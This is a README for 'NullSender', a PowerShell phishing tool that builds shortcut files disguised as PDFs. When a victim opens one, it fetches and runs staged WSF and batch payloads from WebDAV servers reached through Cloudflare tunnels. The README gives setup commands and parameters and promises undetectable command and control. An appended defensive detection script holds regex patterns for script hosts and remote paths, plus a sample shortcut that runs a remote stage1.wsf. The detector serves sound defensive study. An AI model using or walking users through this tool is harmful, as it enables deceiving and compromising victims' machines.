NullSender is a PowerShell-based tool that creates deceptive PDF shortcuts for phishing campaigns using Cloudflare tunnels. The tool generates .lnk files that appear as PDF documents but execute malicious payloads, while leveraging Cloudflare's tunneling service to establish secure, undetectable command and control channels. The attack chain involves a multi-stage payload delivery system using WebDAV servers and Windows Script Host (WSH) to bypass security controls and establish persistent access.
- Deceptive PDF Shortcuts: Creates .lnk files that mimic PDF documents with custom icons and filenames
- Cloudflare Tunnel Integration: Uses Cloudflare's tunneling service for secure and covert communication
- Multi-Stage Payload Delivery: Implements a staged approach using WebDAV servers and WSH scripts
- Customizable Parameters: Configurable filenames, icons, descriptions, and target paths
- WebDAV File Hosting: Serves malicious payloads through WebDAV for stealthy execution
This tool is provided for educational and research purposes only. The authors and contributors are not responsible for any misuse of this software. Users are solely responsible for ensuring compliance with applicable laws and regulations in their jurisdiction.
Important Notes:
- This tool is intended for authorized security testing and educational purposes only
- Users must obtain proper authorization before testing on any systems they do not own
- The authors do not maintain or support this repository
- Use at your own risk - no warranty is provided
- Misuse of this tool may violate computer fraud laws and other regulations
By using this tool, you acknowledge that you understand these terms and accept full responsibility for your actions.
Download and install cloudflared from the official Cloudflare website.
For the shortcut created by Create-PDF.ps1 to appear authentic, a PDF-style icon is recommended. You can provide one via the -IconPath parameter by pointing to an icon from an application (like Adobe Reader) or using a custom .ico file.
Choose one of the following options:
Option A: IIS WebDAV Server (Default)
The tool automatically creates an IIS WebDAV server configuration when you run the setup script.
The default WebDAV server will be accessible at http://localhost:80 and can be tunneled through Cloudflare for external access.
Option B: Python WebDAV Server (Quick Setup)
The Python http server module can be used as a testing/development server, but it might not be well suited to a production environment.
Option C: Apache WebDAV Server
An Ansible playbook is available in the playbooks/ directory to automate the setup of an Apache WebDAV server with proper security configurations.
To use the Ansible playbook:
- Navigate to the playbooks/ directory
- Review and modify the hosts file with your target server details
- Run the playbook:
  ansible-playbook -i hosts apache-webdav.yml
- Clone the Repository
  git clone https://github.com/ghosteye-ai/NullSender/
  cd NullSender
- Run the Main Script
  .\Generate-Phish.ps1
By default, the script creates two stages: stage1.wsf and stage2.bat. These stages can be easily modified for any engagement-specific requirements. The script also installs and sets up an IIS WebDAV server and starts a Cloudflare tunnel, assuming cloudflared is installed. If you only want to run individual parts of the payload creation, the corresponding scripts are in /scripts.
- Script Parameters (Optional)
  -TargetPath: Directory where the .lnk file will be created
  -FileName: Name of the file (will be appended with .lnk)
  -WebDAVUrl: URL of your WebDAV server (can be tunneled through Cloudflare)
  -IconPath: (Optional) Path to a custom PDF icon
  -Description: (Optional) Custom description for the shortcut
- The created .lnk file will appear as a PDF document to the victim
- When executed, it will download and execute the payload from your WebDAV server
- Monitor the tunnel logs for successful connections and payload executions
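For defenders, the shortcut behaviour described above (a .lnk that presents as a PDF but starts a script host against a remote path) can be checked mechanically. The following PowerShell is an added example and is not part of NullSender; the function names, the indicator patterns and the sample records are assumptions constructed for illustration.

```powershell
# Added example, not part of NullSender. Flags shortcuts that present as PDFs but
# launch a script host, a script file or a remote path. The indicator patterns are
# assumptions based on the README's description, not taken from the tool's code.

function Get-ShortcutInfo {
    # Read a real .lnk through the WScript.Shell COM object (Windows only).
    param([Parameter(Mandatory)][string]$Path)
    $lnk = (New-Object -ComObject WScript.Shell).CreateShortcut($Path)
    [pscustomobject]@{
        Name      = Split-Path -Leaf $Path
        Target    = $lnk.TargetPath
        Arguments = $lnk.Arguments
        Icon      = $lnk.IconLocation
    }
}

function Test-PdfLureShortcut {
    param([Parameter(Mandatory, ValueFromPipeline)]$Shortcut)
    process {
        $cmd = "$($Shortcut.Target) $($Shortcut.Arguments)"
        # Explorer never shows the .lnk extension, so "x.pdf.lnk" displays as "x.pdf".
        $looksLikePdf = ($Shortcut.Name -match '\.pdf\.lnk$') -or
                        ($Shortcut.Icon -match 'acro|pdf')
        $reasons = @()
        if ($cmd -match '\b(wscript|cscript|cmd|powershell)(\.exe)?\b') { $reasons += 'script host or shell' }
        if ($cmd -match '\.(wsf|bat|vbs|js|ps1)\b')  { $reasons += 'script file' }
        if ($cmd -match '\\\\[^\\\s]+\\|https?://') { $reasons += 'remote (UNC/WebDAV/HTTP) path' }
        [pscustomobject]@{
            Name       = $Shortcut.Name
            Suspicious = $looksLikePdf -and ($reasons.Count -gt 0)
            Reasons    = $reasons -join '; '
        }
    }
}

# Constructed sample records, not real artifacts. On an endpoint, feed real files:
#   Get-ChildItem $env:USERPROFILE -Recurse -Filter *.lnk |
#       ForEach-Object { Get-ShortcutInfo $_.FullName } | Test-PdfLureShortcut
$samples = @(
    [pscustomobject]@{ Name = 'Invoice.pdf.lnk'; Target = 'C:\Windows\System32\wscript.exe'
                       Arguments = '\\webdav.example.test\share\stage1.wsf'
                       Icon = 'C:\Program Files\Reader\AcroRd32.exe,0' }
    [pscustomobject]@{ Name = 'Report.lnk'; Target = 'C:\Docs\Report.pdf'
                       Arguments = ''; Icon = 'C:\Program Files\Reader\AcroRd32.exe,0' }
    [pscustomobject]@{ Name = 'Build.lnk'; Target = 'C:\Windows\System32\cmd.exe'
                       Arguments = '/c C:\src\build.bat'; Icon = 'C:\Windows\System32\cmd.exe,0' }
)
$samples | Test-PdfLureShortcut | Format-Table -AutoSize
```

Only the first sample combines a PDF appearance with a script host and a remote path; the ordinary PDF shortcut and the build shortcut are included to show what the check leaves alone.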
Example Usage: